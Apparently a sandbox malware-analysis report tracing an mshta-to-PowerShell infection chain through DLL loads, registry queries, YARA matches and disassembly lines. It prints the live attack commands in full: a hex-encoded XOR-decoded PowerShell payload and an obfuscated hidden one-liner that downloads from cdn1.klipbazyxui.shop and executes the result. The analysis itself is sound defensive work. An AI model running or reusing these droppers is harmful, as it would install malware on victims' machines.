Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: powershell.exe, 00000004.00000002.2946665366.0000000007510000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: powershell.exe, 00000004.00000002.2946665366.0000000007510000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: powershell.exe, 00000004.00000002.2946159742.0000000007410000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: powershell.exe, 00000004.00000002.2946159742.0000000007410000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 4.2.powershell.exe.7410000.1.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 4.2.powershell.exe.7410000.1.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 4.2.powershell.exe.7410000.1.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 4.2.powershell.exe.7410000.1.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 4.2.powershell.exe.7410000.1.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 4.2.powershell.exe.7510000.2.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 4.2.powershell.exe.7510000.2.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 4.2.powershell.exe.7510000.2.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: FromBase64String($z));$byteString = $enc.GetBytes($string);$xordData = $(for ($i = 0; $i -lt $byteString.length; ) {for ($j = 0; $j -lt $xorkey.length; $j++) {$byteString[$i] -bxor $xorkey[$j];$i++;if

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function edSX($vXCW){return -split ($vXCW -replace '..', '0x$& ')};$lUxv = edSX('A31F9B9673349AFE3B35F831884A152ADF6EC95559396B5F57D0E445E50347CF7164B0CDC68178F82B54654182EB897B5224571B2475EFD970B415458A7AF789FC1E6F7ABBFF5A67EBB9C103A46965E4B312951120DDD87FDAA3DC376F7EB96A063404F5B45999454184A2BBA29F2CB28EA21A2DA856B254CC0F3BFD7FBCDF179A40AF3A54D7A9C674CC8BB41E0C4FD97C7113C648A150674D11EC4AD48559848466FBB95FE08C8526FBFA39058B783166A23AE29F4DA0CF61DC080DFC185C0793C8E21A60AF85E83785E482739FE2AF207C5F01D57E37973B829781481ABDCE8569691AFD4276B4F5A07138F03A1BEA59CD80A67D128F1F59B5F08CD14560906ADC8FC07ECEACD2CA936BF14DD67C0C322A614DA8949AAE4F3F3DD8C4963919366C68E97BE23A086EA39D6E3567274098AE593624ACBD21A7AA02CDE0168602BEA805BA25CAB6368F6F34EA5F73DE61B4BD7C0CA3FF765FEE92A3FF56F66AC139EA96B5A4189ECC7256D4AEBE2026C1ACAFA195958FBE0CF912FEE6E99CA63092E010DF6B7742F3AC98BBD4B06F22EC971C9EC6E3ABCB27953F51DF704695B061AC6BEC33C1B700DBA4BB023B15DA076C042FAA3A95A07706C8AE7E88553450F62468B509FEA6D5CB4350A584FBB2D977F158D34857F26CCC849BE780CB8166B92B610B64C3334FCE35D8F1F478230DAE6C3E86CF93844296A874DEEC71EC4B6694A2AD0018F51C2572849BC046EAC16B467EAB7E6229F03DC638AA510B63A4EBACB32766940CCE7DAF1FCF4F63C76BE1C97A0A09F5362D2D1417AF18230B809ACD1D1F225F4EFC165C55A8BC086346DC9D3715EC116DE095878D1134ADD3C14DC8125EB0D61BEC915BCE4B6FB0EF0A1BDBBE7E3A1F66B8842FC06096AF4E459E3AB4313C4793DCA582EC173E0DAC64534C8B839898A145779CF154674C0AE6F37B54D6B4B13E79735CC2476D5784F96960B10D71A61AB4B67A58B61390249E457FF1005BEB7ACF7A43EE2768E04D4F6FEF537A461B936EE4C0D1808455EBC1927A1E4FC80E91C69F015D288EC31966605CA3FAC7BDFE119B9780C54C172AB01029519B661359B035D477BFE75C71BA1D61A3FD4C7C56A2E76386F7B937A5DDE32CCE6982DEE8E464B2F0D40D595F50EC1801407ADB67F18011AE692B6F0BAA0465ACC91F95CC572304B79D3582A2AEA5F4453DFA1D7E39F5531233C6359F55D33BE19A911559F608653DFD08BBAF79AF2B0917D6EEBE46595756FB41358F33598CCF1E7BE52592115909F9E75477B49B50BA1E60CFBAECFE4AAF4141B07F42C5D596954C405EB172D697BDC63DCEBF8001CA89829E354D2DA20DC9739369899AF53E537DA7B73870831EEFEF889845BBDCF9501654607CF133DCDB9D67420AFC78AA9092BD52A145B944360F0BFECDC7D4932028F16E87771AC1D866EBEC7289803D86ED9904AFDFBFBF5BB048929DB7DB2AC8F63C7EDB203F8E1A174EBE2157AE182E3DBDED3349D83D3D3BC6745E2D5DF17346843FF66DB2BDFC5716E26800477742AF6898AD106316D2237BE4FADEE711172BE9B793AFE378904EC0F53DEE91616E5612EDE3DFB0863A38BAEFACED7F01D988DDCA3304F15DB3A3C71E8CA78B9035B71F7D878AE021C1C142705EC1CBA01FF772D3D880B207B97552700D5D050FE7D8F10D439FF89CEC8E7F26390CBB53F8B2F2E00092A567DDCE5162D4A1597C086F61B398754D709679F2E64B246D6B19AA8BCC08D2AA9B4B391B538D4260FF70CCD920892870858B847D56EAE7A4C64CD4F4C47355F52A842C2647543A4410AB6F0BB68693D79D2DC1A5FAF21241F5C66270CDE2DDD2DEF48DA7DA406D1A0A40075E041A292A5BEAAD267D3D4ED90575F605397391B20AF0B0020D8533E080691845C6A97A37F6782F4C741D9A038423C502F9B4B92EE6E0B4478D1356F52573E4DE57496D7A6B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command SI Variable:\s9q 'https://cdn1.klipbazyxui.shop/web44.dle';Set-Variable d47 ([Net.WebClient]::New());.(GV xect).Value.(((GV xect).Value\|Get-Member)[6].Name).(((GV xect).Value.(((GV xect).Value\|Get-Member)[6].Name)\|Get-Member\|?{$_.Name-ilike'd'}).Name)((GV xect).Value.(((GV xect).Value\|Get-Member)[6].Name).GetCommandName('In-Exion',$TRUE,$TRUE),[System.Management.Automation.CommandTypes]::Cmdlet)(LS Variable:d47).Value.(((([Net.WebClient]::New()\|Get-Member)\|?{$_.Name-ilike'Dg'}).Name))((Get-Variable s9q -ValueOn))
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function edSX($vXCW){return -split ($vXCW -replace '..', '0x$& ')};$lUxv = edSX('A31F9B9673349AFE3B35F831884A152ADF6EC95559396B5F57D0E445E50347CF7164B0CDC68178F82B54654182EB897B5224571B2475EFD970B415458A7AF789FC1E6F7ABBFF5A67EBB9C103A46965E4B312951120DDD87FDAA3DC376F7EB96A063404F5B45999454184A2BBA29F2CB28EA21A2DA856B254CC0F3BFD7FBCDF179A40AF3A54D7A9C674CC8BB41E0C4FD97C7113C648A150674D11EC4AD48559848466FBB95FE08C8526FBFA39058B783166A23AE29F4DA0CF61DC080DFC185C0793C8E21A60AF85E83785E482739FE2AF207C5F01D57E37973B829781481ABDCE8569691AFD4276B4F5A07138F03A1BEA59CD80A67D128F1F59B5F08CD14560906ADC8FC07ECEACD2CA936BF14DD67C0C322A614DA8949AAE4F3F3DD8C4963919366C68E97BE23A086EA39D6E3567274098AE593624ACBD21A7AA02CDE0168602BEA805BA25CAB6368F6F34EA5F73DE61B4BD7C0CA3FF765FEE92A3FF56F66AC139EA96B5A4189ECC7256D4AEBE2026C1ACAFA195958FBE0CF912FEE6E99CA63092E010DF6B7742F3AC98BBD4B06F22EC971C9EC6E3ABCB27953F51DF704695B061AC6BEC33C1B700DBA4BB023B15DA076C042FAA3A95A07706C8AE7E88553450F62468B509FEA6D5CB4350A584FBB2D977F158D34857F26CCC849BE780CB8166B92B610B64C3334FCE35D8F1F478230DAE6C3E86CF93844296A874DEEC71EC4B6694A2AD0018F51C2572849BC046EAC16B467EAB7E6229F03DC638AA510B63A4EBACB32766940CCE7DAF1FCF4F63C76BE1C97A0A09F5362D2D1417AF18230B809ACD1D1F225F4EFC165C55A8BC086346DC9D3715EC116DE095878D1134ADD3C14DC8125EB0D61BEC915BCE4B6FB0EF0A1BDBBE7E3A1F66B8842FC06096AF4E459E3AB4313C4793DCA582EC173E0DAC64534C8B839898A145779CF154674C0AE6F37B54D6B4B13E79735CC2476D5784F96960B10D71A61AB4B67A58B61390249E457FF1005BEB7ACF7A43EE2768E04D4F6FEF537A461B936EE4C0D1808455EBC1927A1E4FC80E91C69F015D288EC31966605CA3FAC7BDFE119B9780C54C172AB01029519B661359B035D477BFE75C71BA1D61A3FD4C7C56A2E76386F7B937A5DDE32CCE6982DEE8E464B2F0D40D595F50EC1801407ADB67F18011AE692B6F0BAA0465ACC91F95CC572304B79D3582A2AEA5F4453DFA1D7E39F5531233C6359F55D33BE19A911559F608653DFD08BBAF79AF2B0917D6EEBE46595756FB41358F33598CCF1E7BE52592115909F9E75477B49B50BA1E60CFBAECFE4AAF4141B07F42C5D596954C405EB172D697BDC63DCEBF8001CA89829E354D2DA20DC9739369899AF53E537DA7B73870831EEFEF889845BBDCF9501654607CF133DCDB9D67420AFC78AA9092BD52A145B944360F0BFECDC7D4932028F16E87771AC1D866EBEC7289803D86ED9904AFDFBFBF5BB048929DB7DB2AC8F63C7EDB203F8E1A174EBE2157AE182E3DBDED3349D83D3D3BC6745E2D5DF17346843FF66DB2BDFC5716E26800477742AF6898AD106316D2237BE4FADEE711172BE9B793AFE378904EC0F53DEE91616E5612EDE3DFB0863A38BAEFACED7F01D988DDCA3304F15DB3A3C71E8CA78B9035B71F7D878AE021C1C142705EC1CBA01FF772D3D880B207B97552700D5D050FE7D8F10D439FF89CEC8E7F26390CBB53F8B2F2E00092A567DDCE5162D4A1597C086F61B398754D709679F2E64B246D6B19AA8BCC08D2AA9B4B391B538D4260FF70CCD920892870858B847D56EAE7A4C64CD4F4C47355F52A842C2647543A4410AB6F0BB68693D79D2DC1A5FAF21241F5C66270CDE2DDD2DEF48DA7DA406D1A0A40075E041A292A5BEAAD267D3D4ED90575F605397391B20AF0B0020D8533E080691845C6A97A37F6782F4C741D9A038423C502F9B4B92EE6E0B4478D1356F52573E4DE57496D7A6B	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command SI Variable:\s9q 'https://cdn1.klipbazyxui.shop/web44.dle';Set-Variable d47 ([Net.WebClient]::New());.(GV xect).Value.(((GV xect).Value\|Get-Member)[6].Name).(((GV xect).Value.(((GV xect).Value\|Get-Member)[6].Name)\|Get-Member\|?{$_.Name-ilike'd'}).Name)((GV xect).Value.(((GV xect).Value\|Get-Member)[6].Name).GetCommandName('In-Exion',$TRUE,$TRUE),[System.Management.Automation.CommandTypes]::Cmdlet)(LS Variable:d47).Value.(((([Net.WebClient]::New()\|Get-Member)\|?{$_.Name-ilike'Dg'}).Name))((Get-Variable s9q -ValueOn))	Jump to behavior

Yara detected Costura Assembly Loader

Source: Yara match	File source: 4.2.powershell.exe.8c90000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2954035753.0000000008C90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected MSILLoadEncryptedAssembly

Source: Yara match

File source: Process Memory Space: powershell.exe PID: 3784, type: MEMORYSTR

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04F310C8 push eax; ret	2_2_04F31102
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04F31128 push eax; ret	2_2_04F31132
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04F31118 push eax; ret	2_2_04F31122
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04F31108 push eax; ret	2_2_04F31112
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_04FC11A0 push eax; ret	4_2_04FC11AA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_04FC1190 push eax; ret	4_2_04FC119A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_04FC1180 push eax; ret	4_2_04FC118A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_04FC1163 push eax; ret	4_2_04FC117A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_04FCDC94 push ebx; iretd	4_2_04FCDC92
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_04FCDC6D push ebx; iretd	4_2_04FCDC92
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_072B6A10 push ss; ret	4_2_072B6A11
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_073F7200 push eax; ret	4_2_073F720E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_073F7240 push edx; ret	4_2_073F724E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_073F3AB0 pushfd ; ret	4_2_073F3ACA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_073F6C01 push 9BD8073Dh; ret	4_2_073F6C06
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_08986190 pushad ; iretd	4_2_08986191
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0043D0F0 push eax; mov dword ptr [esp], 03020130h	8_2_0043D0F1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00444943 push es; ret	8_2_0044494C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0043A480 push eax; mov dword ptr [esp], C9D6D7D4h	8_2_0043A48E

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
